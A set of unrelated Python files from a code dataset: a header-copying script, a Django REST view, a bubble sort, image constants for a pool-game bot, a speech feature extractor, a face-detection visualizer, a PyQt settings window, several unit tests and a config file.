result = (outputPath is not None) and (searchStartDir is not None) and (isIncludeFolder is not None)
return result, outputPath, searchStartDir, isIncludeFolder, excludePaths
def Dump():
print ("Paramater Error!!\n")
print ("-OutputPath \'outputpath\' -SearchStartDir \'searchstartDir\' -IsIncludeFolder \'True or False\' -ExcludePaths excludepath\n")
print ('Example 1 :')
print ("-OutputPath ../../Output -SearchStartDir ./Engine -IsIncludeFolder False -ExcludePaths ./Engine/ShaderCodes,./Engine/Scripts \n")
return
CONSOLE_LINE = "***********************************************"
print (CONSOLE_LINE + '\n')
print ("SOC Framework HeaderOrganizer\n")
result, outputPath, searchStartDir, isIncludeFolder, excludePaths = CheckParameter()
if result == False:
Dump()
print (CONSOLE_LINE)
exit()
headerFormat = ['.h', '.hpp', '.inl']
def MakeDirectoryPiramid(path):
folders = path.split('\\')
folders.reverse()
for i in list(range(1, len(folders))):
invIdx = len(folders) - i
folders[invIdx - 1] = folders[invIdx] + '\\' + folders[invIdx - 1]
folders.reverse()
return folders
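# Worked example (added for illustration): MakeDirectoryPiramid('a\\b\\c')
# returns ['a', 'a\\b', 'a\\b\\c'], i.e. every parent prefix first, so the
# os.makedirs loop further down can create missing folders parent-first.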
# Clear Output Header Folder
if os.path.exists(outputPath):
shutil.rmtree(outputPath, ignore_errors=True)
os.makedirs(outputPath)
targetDir = os.path.normpath(searchStartDir)
for (path, dirs, files) in os.walk(targetDir):
for fileNameWithExtension in files:
        if excludePaths is not None and path in excludePaths:
continue
fileExtension = fileNameWithExtension[fileNameWithExtension.rfind('.'):]
if not (fileExtension.lower() in headerFormat):
continue
fileFullPath = path + "\\" + fileNameWithExtension
saveFilePath = ""
if isIncludeFolder:
relativePath = path[len(searchStartDir)+1:]
saveFolderPath = outputPath + '\\' + relativePath
saveFilePath = saveFolderPath + '\\' + fileNameWithExtension
# print saveFolderPath
folders = MakeDirectoryPiramid(saveFolderPath)
for folderPath in folders:
if not os.path.exists(folderPath):
os.makedirs(folderPath)
shutil.copy(fileFullPath, saveFilePath)
else:
saveFilePath = outputPath + '\\' + fileNameWithExtension
shutil.copy(fileFullPath, saveFilePath)
print (fileFullPath + " -> " + saveFilePath)
print ("\nDone!\n")
print (CONSOLE_LINE) | StarcoderdataPython |
1793470 | <filename>apps/questions_app/api/views.py<gh_stars>0
from rest_framework import generics
from apps.questions_app.api.serializers import (QuestionSerializer)
from apps.questions_app.models import Question
import random
class QuestionsListAPIView(generics.ListAPIView):
"""this endpoint randomly returns a list of 10 questions"""
serializer_class = QuestionSerializer
def get_queryset(self):
pool = list(Question.objects.all())
random.shuffle(pool)
object_list = pool[:3]
return object_list
| StarcoderdataPython |
37372 | #!/usr/bin/python3
'''
BubbleSort.py
by <NAME>
'''
array = []
print("Enter at least two numbers to start bubble-sorting.")
print("(You can end inputing anytime by entering nonnumeric)")
# get numbers
while True:
try:
array.append(float(input(">> ")))
except ValueError: # exit inputing
break
print("\nThe array you've entered was:"); print(array)
print("\nNow sorting...")
# sorting
for x in range(len(array)-1, 0, -1):
for y in range(x):
if array[y] > array[y+1]:
array[y], array[y+1] = array[y+1], array[y]
print(array)
# output
print("\nAll done! Now the moment of truth!")
print(array)
| StarcoderdataPython |
31734 |
# IMAGES #
# UI NAVIGATION #
img_addFriend = "add_friend.png"
img_allow = "allow.png"
img_allowFlash = "enableflash_0.png"
img_allowFlash1 = "enableflash_1.png"
img_allowFlash2 = "enableflash_2.png"
img_alreadyStarted = "alreadystarted.png"
img_alreadyStarted1 = "alreadystarted1.png"
img_backButton = "back_button.png"
img_beginningGame = "beginninggame.png"
img_challengeFriend = "challenge_friend.png"
img_cheapButtonFriend = "cheap_button_friend.png"
img_cheapButton = "cheap_button.png"
img_cueUpdate = "cueUpdate.png"
img_cues = "cues.png"
img_collectCoins = "collectcoins.png"
img_collectCoins1 = "collectcoins_1.png"
img_defaultAcct = "defaultaccount.png"
img_eightBallSpinButton = "8ballspin_button.png"
img_emailArea = "email_area.png"
img_facebookLogo = "facebooklogo.png"
img_inviteFriend = "invite_friend.png"
img_isGameStart = "isgamestart.png"
img_loginButton3 = "login3_button.png"
img_loginWithMiniclip = "login_with_miniclip.png"
img_luckyShot = "luckyShot.png"
img_mainMenuBefore = "mainmenu_before.png"
img_passwordArea = "password_area.png"
img_playButtonGuest = "play_button_guest.png"
img_playButtonLogged = "play_button_logged.png"
img_playFree = "playFree.png"
img_playFriends = "playfriends.png"
img_playNow = "playnow.png"
img_poolChoice = "poolchoice.png"
img_poolChoice1 = "poolchoice1.png"
img_poolChoice200 = "poolchoice200.png"
img_poolChoice200_1 = "poolchoice200_1.png"
img_searchFriends = "search_friends.png"
img_searchFriends1 = "search_friends2.png"
img_searchFriends2 = "search_friends3.png"
img_signUpLogin = "signup_login_button.png"
img_spinWinCollect = "spinwin_collect.png"
img_spinWinIcon = "spinwinicon.png"
img_spinWinX = "spinwin_x.png"
img_topRightCorner = "top_right_corner.png"
img_topRightCornerLogged = "top_right_corner_logged.png"
img_turn = "turn.png"
img_turn1 = "turn1.png"
img_opponentTurn = "playertwoturn.png"
img_opponentTurn1 = "playertwoturn1.png"
img_url = "url.png"
img_url2 = "url2.png"
img_url3 = "url3.png"
img_urlBar = "urlbar.png"
img_unsecure = "unsecure.png"
img_xOut = "xout.png"
# UI NAVIGATION #
# GAME NAVIGATION #
img_1ball = "1ball.png"
img_2ball = "2ball.png"
img_3ball = "3ball.png"
img_4ball = "4ball.png"
img_5ball = "5ball.png"
img_6ball = "6ball.png"
img_7ball = "7ball.png"
img_8ball = "8ball.png"
img_9ball = "9ball.png"
img_10ball = "10ball.png"
img_11ball = "11ball.png"
img_12ball = "12ball.png"
img_13ball = "13ball.png"
img_14ball = "14ball.png"
img_15ball = "15ball.png"
img_1ballDark = "1ballDark.png"
img_2ballDark = "2ballDark.png"
img_3ballDark = "3ballDark.png"
img_4ballDark = "4ballDark.png"
img_5ballDark = "5ballDark.png"
img_6ballDark = "6ballDark.png"
img_7ballDark = "7ballDark.png"
img_8ballDark = "8ballDark.png"
img_9ballDark = "9ballDark.png"
img_10ballDark = "10ballDark.png"
img_11ballDark = "11ballDark.png"
img_12ballDark = "12ballDark.png"
img_13ballDark = "13ballDark.png"
img_14ballDark = "14ballDark.png"
img_15ballDark = "15ballDark.png"
img_cueball = "cueball.png"
img_eightball = "eightball.png"
img_ballPic1 = "ballpic1.png"
img_tlh = "tlh.png"
img_tmh = "tmh.png"
img_trh = "trh.png"
img_blh = "blh.png"
img_bmh = "bmh.png"
img_brh = "brh.png"
img_topRail = "toprail.png"
img_bottomRail = "bottomrail.png"
img_leftRail = "leftrail.png"
img_rightRail = "rightrail.png"
# GAME NAVIGATION #
# IMAGES #
debug = False | StarcoderdataPython |
22808 | import os
import sys
import shutil
import glob
import time
import multiprocessing as mp
if len(sys.argv)!=4:
print("Usage: ")
print("python extract_features_WORLD.py <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")
sys.exit(1)
# current working directory (top-level project directory)
current_dir = os.getcwd()
# input audio directory
wav_dir = sys.argv[1]
# Output features directory
out_dir = sys.argv[2]
# initializations
fs = int(sys.argv[3])
# tools directory
world = os.path.join(current_dir, "tools/bin/WORLD")
sptk = os.path.join(current_dir, "tools/bin/SPTK-3.11")
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if fs == 16000:
nFFTHalf = 1024
alpha = 0.58
elif fs == 22050:
nFFTHalf = 1024
alpha = 0.65
elif fs == 44100:
nFFTHalf = 2048
alpha = 0.76
elif fs == 48000:
nFFTHalf = 2048
alpha = 0.77
else:
print("As of now, we don't support %d Hz sampling rate." %(fs))
print("Please consider either downsampling to 16000 Hz or upsampling to 48000 Hz")
sys.exit(1)
#mel-cepstral analysis order (the bap order depends on the sampling rate)
mcsize=59
def get_wav_filelist(wav_dir):
wav_files = []
for file in os.listdir(wav_dir):
whole_filepath = os.path.join(wav_dir,file)
if os.path.isfile(whole_filepath) and str(whole_filepath).endswith(".wav"):
wav_files.append(whole_filepath)
elif os.path.isdir(whole_filepath):
wav_files += get_wav_filelist(whole_filepath)
wav_files.sort()
return wav_files
def process(filename):
'''
The function decomposes a wav file into F0, mel-cepstral coefficients, and aperiodicity
:param filename: path to wav file
:return: .lf0, .mgc and .bap files
'''
file_id = os.path.basename(filename).split(".")[0]
print('\n' + file_id)
### WORLD ANALYSIS -- extract vocoder parameters ###
### extract f0, sp, ap ###
world_analysis_cmd = "%s %s %s %s %s" % (os.path.join(world, 'analysis'), \
filename,
os.path.join(out_dir, file_id + '.f0'), \
os.path.join(out_dir, file_id + '.sp'), \
os.path.join(out_dir, file_id + '.bapd'))
os.system(world_analysis_cmd)
### convert f0 to lf0 ###
sptk_x2x_da_cmd = "%s +da %s > %s" % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.f0'), \
os.path.join(out_dir, file_id + '.f0a'))
os.system(sptk_x2x_da_cmd)
sptk_x2x_af_cmd = "%s +af %s | %s > %s " % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.f0a'), \
os.path.join(sptk, 'sopr') + ' -magic 0.0 -LN -MAGIC -1.0E+10', \
os.path.join(out_dir, file_id + '.lf0'))
os.system(sptk_x2x_af_cmd)
### convert sp to mgc ###
sptk_x2x_df_cmd1 = "%s +df %s | %s | %s >%s" % (os.path.join(sptk, 'x2x'), \
os.path.join(out_dir, file_id + '.sp'), \
os.path.join(sptk, 'sopr') + ' -R -m 32768.0', \
os.path.join(sptk, 'mcep') + ' -a ' + str(alpha) + ' -m ' + str(
mcsize) + ' -l ' + str(
nFFTHalf) + ' -e 1.0E-8 -j 0 -f 0.0 -q 3 ', \
os.path.join(out_dir, file_id + '.mgc'))
os.system(sptk_x2x_df_cmd1)
### convert bapd to bap ###
sptk_x2x_df_cmd2 = "%s +df %s > %s " % (os.path.join(sptk, "x2x"), \
os.path.join(out_dir, file_id + ".bapd"), \
os.path.join(out_dir, file_id + '.bap'))
os.system(sptk_x2x_df_cmd2)
print("--- Feature extraction started ---")
start_time = time.time()
# get wav files list
wav_files = get_wav_filelist(wav_dir)
# do multi-processing
pool = mp.Pool(mp.cpu_count())
pool.map(process, wav_files)
# clean temporal files
#shutil.rmtree(out_dir, ignore_errors=True)
#shutil.rmtree(out_dir, ignore_errors=True)
#for zippath in glob.iglob(os.path.join(out_dir, '*.bapd')):
# os.remove(zippath)
clean_temp_files_cmd = "rm -rf %s/*.bapd %s/*.f0a %s/*.f0 %s/*.sp" % (out_dir, out_dir, out_dir, out_dir)
os.system(clean_temp_files_cmd)
print("You should have your features ready in: "+out_dir)
(m, s) = divmod(int(time.time() - start_time), 60)
print(("--- Feature extraction completion time: %d min. %d sec ---" % (m, s)))
| StarcoderdataPython |
3256213 | <filename>visualizer/main_ui.py<gh_stars>0
import eel
import json
import cv2
import base64
import numpy as np
from PIL import Image as PILlib
import io
import re
import sys, os
from threading import Thread
class Images:
@staticmethod
def read(im_path):
return cv2.imread(im_path)
@staticmethod
def unpack_im(pack, image_type):
if image_type == 'numpy':
b64, dtype, shape = pack
return np.frombuffer(base64.decodebytes(b64.encode()), dtype=dtype).reshape(shape)
elif image_type == 'jpeg' or image_type == 'jpg':
m = re.search(r'base64,(.*)', pack)
if m is None:
raise IndexError
imgstring = m.group(1)
# aplicamos una correccion para evitar un error de padding
imgbyte = imgstring.encode()
pad = len(pack.partition(",")[2]) % 4
imgbyte += b"="*pad
image = cv2.imdecode(np.frombuffer(io.BytesIO(base64.b64decode(imgbyte)).getbuffer(), np.uint8), -1)
return image[..., :3]
@staticmethod
def pack_im(im, image_type):
if image_type == 'numpy':
return base64.b64encode(np.ascontiguousarray(im)).decode(), im.dtype.name, im.shape
elif image_type == 'jpeg' or image_type == 'jpg':
return 'data:image/jpg; base64,' + base64.b64encode(cv2.imencode('.jpg', im)[1]).decode("utf-8")
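# Round-trip sketch (illustrative only; the GUI below uses the 'jpg' path):
#   packed = Images.pack_im(frame, 'jpg')     # numpy BGR frame -> base64 data URL
#   frame = Images.unpack_im(packed, 'jpg')   # data URL -> numpy array again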
class Visualizer():
def __init__(self, monitor, callback):
self.monitor = monitor
self.callback = callback
self.is_close = False
def close(self, *vargs):
self.is_close = True
def run(self):
eel.init(os.path.join(os.path.dirname(os.path.abspath(__file__))))
@eel.expose
def set_settings(data):
data = json.loads(data)
self.monitor.set_mode(int(data['mode']))
self.monitor.set_window(data['window'])
self.monitor.change_coords(int(data['left']),
int(data['top']),
int(data['width']),
int(data['height']))
@eel.expose
def get_settings():
params = {
'left': self.monitor.current_monitor['left'],
'top': self.monitor.current_monitor['top'],
'width': self.monitor.current_monitor['width'],
'height': self.monitor.current_monitor['height'],
'mode': self.monitor.mode,
'windows': self.monitor.get_windows(),
'current_window': self.monitor.current_window.get_wm_name() if self.monitor.current_window is not None else None
}
print(params)
return json.dumps(params)
def __run():
while not self.is_close:
frame, faces = self.callback()
frame = frame[..., ::-1].copy()
for face in faces:
x1, y1, x2, y2 = face.bb
if face.character is not None:
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2, -1)
else:
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 255), 2, -1)
unique_bios = set()
for face in faces:
if face.character is not None:
unique_bios.add(face.character)
data = {
'image_detection': Images.pack_im(frame, 'jpg'),
'bios': [{'photo': Images.pack_im(character.thumbnail, 'jpg'), 'name': character.name, 'description': character.description} for character in unique_bios]
}
data_json = json.dumps(data)
eel.draw(data_json)
Thread(target=__run).start()
eel.start('main.html', mode='chrome', port=0, size=(520, 1280), close_callback=self.close)
| StarcoderdataPython |
1793830 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'page2.ui'
#
# Created by: PyQt5 UI code generator 5.15.5
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import os
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.showMaximized()
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.nick = QtWidgets.QComboBox(self.centralwidget)
self.nick.setObjectName("nick")
self.nick.addItem("")
self.nick.addItem("")
self.nick.addItem("")
self.nick.addItem("")
self.gridLayout.addWidget(self.nick, 0, 0, 1, 1)
self.allow = QtWidgets.QRadioButton(self.centralwidget)
self.allow.setObjectName("allow")
self.gridLayout.addWidget(self.allow, 0, 3, 1, 1)
self.deny_2 = QtWidgets.QRadioButton(self.centralwidget)
self.deny_2.setObjectName("deny_2")
self.gridLayout.addWidget(self.deny_2, 1, 4, 1, 1)
self.profile_2 = QtWidgets.QComboBox(self.centralwidget)
self.profile_2.setObjectName("profile_2")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.gridLayout.addWidget(self.profile_2, 1, 2, 1, 1)
self.profile_3 = QtWidgets.QComboBox(self.centralwidget)
self.profile_3.setObjectName("profile_3")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.gridLayout.addWidget(self.profile_3, 2, 2, 1, 1)
self.deny_3 = QtWidgets.QRadioButton(self.centralwidget)
self.deny_3.setObjectName("deny_3")
self.gridLayout.addWidget(self.deny_3, 2, 4, 1, 1)
self.nick_2 = QtWidgets.QComboBox(self.centralwidget)
self.nick_2.setObjectName("nick_2")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.gridLayout.addWidget(self.nick_2, 1, 0, 1, 1)
self.nick_3 = QtWidgets.QComboBox(self.centralwidget)
self.nick_3.setObjectName("nick_3")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.gridLayout.addWidget(self.nick_3, 2, 0, 1, 1)
self.ip = QtWidgets.QComboBox(self.centralwidget)
self.ip.setObjectName("ip")
self.ip.addItem("")
self.ip.addItem("")
self.ip.addItem("")
self.ip.addItem("")
self.gridLayout.addWidget(self.ip, 0, 1, 1, 1)
self.deny = QtWidgets.QRadioButton(self.centralwidget)
self.deny.setObjectName("deny")
self.gridLayout.addWidget(self.deny, 0, 4, 1, 1)
self.ip_2 = QtWidgets.QComboBox(self.centralwidget)
self.ip_2.setObjectName("ip_2")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.gridLayout.addWidget(self.ip_2, 1, 1, 1, 1)
self.ip_3 = QtWidgets.QComboBox(self.centralwidget)
self.ip_3.setObjectName("ip_3")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.gridLayout.addWidget(self.ip_3, 2, 1, 1, 1)
self.allow_3 = QtWidgets.QRadioButton(self.centralwidget)
self.allow_3.setObjectName("allow_3")
self.gridLayout.addWidget(self.allow_3, 2, 3, 1, 1)
self.allow_2 = QtWidgets.QRadioButton(self.centralwidget)
self.allow_2.setObjectName("allow_2")
self.gridLayout.addWidget(self.allow_2, 1, 3, 1, 1)
self.profile = QtWidgets.QComboBox(self.centralwidget)
self.profile.setObjectName("profile")
self.profile.addItem("")
self.profile.addItem("")
self.profile.addItem("")
self.profile.addItem("")
self.gridLayout.addWidget(self.profile, 0, 2, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setMaximumSize(QtCore.QSize(548, 410))
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap("/usr/share/hLOSGUI/Capture.png"))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 3, 3, 1, 2)
self.main = QtWidgets.QPushButton(self.centralwidget)
self.main.setStyleSheet("QPushButton {\n"
"color: #333;\n"
"background-color: rgb(0, 255, 0);\n"
"border: 2px solid #555;\n"
"border-radius: 20px;\n"
"border-style: outset;\n"
"padding: 5px;\n"
"}\n"
"\n"
"QPushButton:hover {\n"
"background: qradialgradient(\n"
"cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
"radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
");\n"
"}")
self.main.setObjectName("main")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(630, 400, 161, 141))
self.label.setText("")
#self.label.setPixmap(QtGui.QPixmap("Capture (1).png"))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.main, 3, 1, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1797, 39))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.main.clicked.connect(self.goback)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.nick.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick.setItemText(3, _translate("MainWindow", "Nickname3"))
self.allow.setText(_translate("MainWindow", "Allow Override"))
self.deny_2.setText(_translate("MainWindow", "Deny Override"))
self.profile_2.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile_2.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile_2.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile_2.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.profile_3.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile_3.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile_3.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile_3.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.deny_3.setText(_translate("MainWindow", "Deny Override"))
self.nick_2.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick_2.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick_2.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick_2.setItemText(3, _translate("MainWindow", "Nickname3"))
self.nick_3.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick_3.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick_3.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick_3.setItemText(3, _translate("MainWindow", "Nickname3"))
self.ip.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.deny.setText(_translate("MainWindow", "Deny Override"))
self.ip_2.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip_2.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip_2.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip_2.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.ip_3.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip_3.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip_3.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip_3.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.allow_3.setText(_translate("MainWindow", "Allow Override"))
self.allow_2.setText(_translate("MainWindow", "Allow Override"))
self.profile.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.main.setText(_translate("MainWindow", "Main Menu"))
def goback(self):
MainWindow.close()
os.system("python3 /usr/share/hLOSGUI/page1.py")
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| StarcoderdataPython |
1656308 | from mock import MagicMock
from tests.unit import UnitTestBase
from express.properties.non_scalar.two_dimensional_plot.band_structure import BandStructure
from tests.fixtures.data import BAND_STRUCTURE, HSE_EIGENVALUES_AT_KPOINTS, HSE_BAND_STRUCTURE, EIGENVALUES_AT_KPOINTS
class BandStructureTest(UnitTestBase):
def setUp(self):
super(BandStructureTest, self).setUp()
def tearDown(self):
        super(BandStructureTest, self).tearDown()
def test_band_structure(self):
parser = MagicMock()
parser.attach_mock(MagicMock(return_value=1), "nspins")
parser.attach_mock(MagicMock(return_value=EIGENVALUES_AT_KPOINTS), "eigenvalues_at_kpoints")
property_ = BandStructure("band_structure", parser)
self.assertDeepAlmostEqual(property_.serialize_and_validate(), BAND_STRUCTURE)
def test_hse_band_structure(self):
parser = MagicMock()
parser.attach_mock(MagicMock(return_value=1), "nspins")
parser.attach_mock(MagicMock(return_value=HSE_EIGENVALUES_AT_KPOINTS), "eigenvalues_at_kpoints")
property_ = BandStructure("band_structure", parser, remove_non_zero_weight_kpoints=True)
self.assertDeepAlmostEqual(property_.serialize_and_validate(), HSE_BAND_STRUCTURE)
| StarcoderdataPython |
106746 | <reponame>cogment/cogment-verse
# Copyright 2021 AI Redefined Inc. <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from data_pb2 import Space
from cogment_verse.spaces import flattened_dimensions
def test_flattened_dimensions_discrete():
assert flattened_dimensions(Space(properties=[Space.Property(discrete=Space.Discrete(num=2))])) == 2
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(
discrete=Space.Discrete(
labels=["brake", "accelerate", "do nothing"],
num=2, # Will be ignored as there are more labels
)
)
]
)
)
== 3
)
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"], num=12))
]
)
)
== 12
)
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"])),
Space.Property(key="b", discrete=Space.Discrete(num=5)),
]
)
)
== 8
)
def test_flattened_dimensions_box():
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[2]))])) == 2
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[4]))])) == 4
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[2, 3, 4]))])) == 24
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", box=Space.Box(shape=[10])),
Space.Property(key="b", box=Space.Box(shape=[2, 3, 4])),
]
)
)
== 34
)
def test_flattened_dimensions_mixed():
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", box=Space.Box(shape=[10])),
Space.Property(key="b", discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"])),
Space.Property(key="c", box=Space.Box(shape=[2, 3, 4])),
]
)
)
== 37
)
| StarcoderdataPython |
110039 | # This is a dummy file to allow the automatic loading of modules without error on none.
def setup(robot_config):
return
def say(*args):
return
def mute():
return
def unmute():
return
def volume(level):
return | StarcoderdataPython |
3353275 | <filename>tests/test_compile_acs.py
import os
from mazeexplorer.compile_acs import compile_acs
dir_path = os.path.dirname(os.path.realpath(__file__))
def test_compile_acs(tmpdir):
compile_acs(tmpdir.strpath)
assert os.path.isfile(os.path.join(tmpdir, "outputs", "maze.o"))
assert os.path.getsize(os.path.join(tmpdir, "outputs", "maze.o")) > 0
assert os.path.isdir(os.path.join(tmpdir, "outputs", "sources"))
assert os.path.isdir(os.path.join(tmpdir, "outputs", "images"))
| StarcoderdataPython |
3238450 | import random
import pygame
from basic_model.block import Block
from basic_model.occupant import Occupant
from simu_model.simuboard import SimuBoard
from simu_model.status import Status
class GuiBoard(SimuBoard):
def __init__(self, height, width):
super(GuiBoard, self).__init__(height,width)
self.blocks = [[Block(Occupant.Empty) for w in range(self.width)] for h in range(self.height)]
self.decided = False
self.desired_directions = []
self.desired_positions = []
self.food_spawn_locations = []
self.turn = 0
self.color_set = {
"Empty": (0, 0, 0),
"SnakeBody": (200, 200, 0),
"Food": (250, 20, 20),
"Border": (255, 255, 255)
}
self.width_in_pixel = 500
self.height_in_pixel = 500
self.window = pygame.display.set_mode((self.width_in_pixel, self.height_in_pixel)) # Creates our screen object
def draw_block(self, coord, color, eyes):
dis = self.width_in_pixel // self.width # Width/Height of each cube
x, y = coord # Current row
pygame.draw.rect(self.window, color, (x * dis + 1, y * dis + 1, dis - 2, dis - 2))
if eyes: # Draws the eyes
centre = dis // 2
radius = 3
circle_middle = (x * dis + centre - radius, y * dis + 8)
circle_middle2 = (x * dis + dis - radius * 2, y * dis + 8)
pygame.draw.circle(self.window, self.color_set["Empty"], circle_middle, radius)
pygame.draw.circle(self.window, self.color_set["Empty"], circle_middle2, radius)
def draw_grid(self):
w = self.height_in_pixel
size_btwn = w // self.height # Gives us the distance between the lines
x = 0 # Keeps track of the current x
y = 0 # Keeps track of the current y
for l in range(self.height): # We will draw one vertical and one horizontal line each loop
x = x + size_btwn
y = y + size_btwn
pygame.draw.line(self.window, self.color_set["Border"], (x, 0), (x, w))
pygame.draw.line(self.window, self.color_set["Border"], (0, y), (w, y))
def redraw_window(self):
# random.randint(0,255), random.randint(0,255), random.randint(0,255)
self.window.fill(self.color_set["Empty"]) # Fills the screen with black
#
for snake in self.snake_list:
if snake.status != Status.Alive:
continue
body_list = snake.body_list
snake_color = (random.randint(0,255), random.randint(0,255), random.randint(0,255))
self.draw_block(body_list[0],snake_color,True)
for body in body_list[1:]:
self.draw_block(body,snake_color,False)
#
for food in self.food_list:
self.draw_block(food,self.color_set["Food"],False)
self.draw_grid() # Will draw our grid lines
pygame.display.update() # Updates the screen
def message_box(self, subject, content):
pass
def render(self):
clock = pygame.time.Clock() # creating a clock object
flag = True
self.redraw_window()
| StarcoderdataPython |
1745854 | <gh_stars>0
'''
@author: daniel
'''
## mongoDB
mongoDB_IP = '127.0.0.1'
mongoDB_Port = 27017 # default local port. change this if you use SSH tunneling on your machine (likely 4321 or 27017).
mongoDB_db = 'pub'
## conferences we analysed
booktitles = ['ACL', 'JCDL','SIGIR','ECDL','TPDL','TREC', 'ICWSM', 'ESWC', 'ICSR','WWW', 'ICSE', 'HRI', 'VLDB', 'ICRA', 'ICARCV']
facets = ['dataset', 'method']
use_in_viewer = ['ACL', 'VLDB', 'WWW', 'ICWSM']
min_ne_threshold = 16
nr_top_papers = 6
nr_top_papers_cited = 50
seedsize = 50
iteration = 0
# Root paths
ROOTPATH='<ROOTPATH PROJECT FOLDER>'
PDFNLT_PATH = '<RELATIVE PATH TO PDFNLT FOLDER>'
scholar_query_limit = 65
| StarcoderdataPython |
66150 | <gh_stars>0
from aiflearn.explainers.explainer import Explainer
from aiflearn.explainers.metric_text_explainer import MetricTextExplainer
from aiflearn.explainers.metric_json_explainer import MetricJSONExplainer
| StarcoderdataPython |
3205834 | <reponame>nojoven/CommentsGate
from datetime import datetime
